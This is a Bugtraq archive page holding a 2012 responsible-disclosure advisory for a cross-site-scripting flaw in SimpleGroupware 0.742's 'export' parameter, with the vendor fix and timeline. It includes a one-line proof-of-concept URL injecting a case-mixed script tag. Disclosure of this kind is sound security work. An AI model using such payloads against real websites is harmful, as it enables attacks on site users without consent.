[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SimpleGroupware 0.742 Cross-Site-Scripting vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
From: security@xxxxxxxxxxxx
Date: Mon, 6 Feb 2012 21:19:59 GMT

Advisory:               SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
Advisory ID:            INFOSERVE-ADV2012-01
Author:                 Stefan Schurtz
Contact:                security@xxxxxxxxxxxx
Affected Software:      Successfully tested on SimpleGroupware 0.742
Vendor URL:             http://www.simple-groupware.de/
Vendor Status:          fixed (see Changelog)

==========================
Vulnerability Description
==========================

SimpleGroupware 0.742 'export' parameter XSS vulnerability

==================
PoC-Exploit
==================

http://[target]/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt 
>alert('xss')</ScRiPt>

=========
Solution
=========

Upgrade to the latest Version 0.743

====================
Disclosure Timeline
====================

01-Feb-2012 - informed vendor
02-Feb-2012 - fixed by vendor

========
Credits
========

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===========
References
===========

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2012-01.txt

Prev by Date: [SECURITY] [DSA 2403-2] php5 security update
Next by Date: DEF CON 20 Capture the Flag Announcement
Previous by thread: [SECURITY] [DSA 2403-2] php5 security update
Next by thread: DEF CON 20 Capture the Flag Announcement
Index(es):
- Date
- Thread